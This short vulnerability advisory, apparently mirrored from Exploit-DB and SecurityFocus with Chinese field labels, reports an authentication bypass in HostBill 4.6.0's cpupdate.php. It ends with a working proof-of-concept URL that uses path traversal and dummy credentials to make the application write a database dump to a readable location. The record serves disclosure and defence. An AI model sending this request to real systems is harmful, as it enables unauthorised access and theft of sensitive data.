HostBill – ‘cpupdate.php’ Authentication Bypass

  • 作者: localhost.re
    日期: 2013-05-29
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/38628/
  • source: https://www.securityfocus.com/bid/60958/info
    
    HostBill is prone to an authentication-bypass vulnerability.
    
    Attackers can exploit this issue to gain unauthorized access to the affected application and disclose sensitive information.
    
    HostBill 4.6.0 is vulnerable; other versions may also be affected. 
    
    www.example.com/includes/cpupdate.php?do=backup&filename=../templates_c/DB_Dump.txt&login_username=0&password=0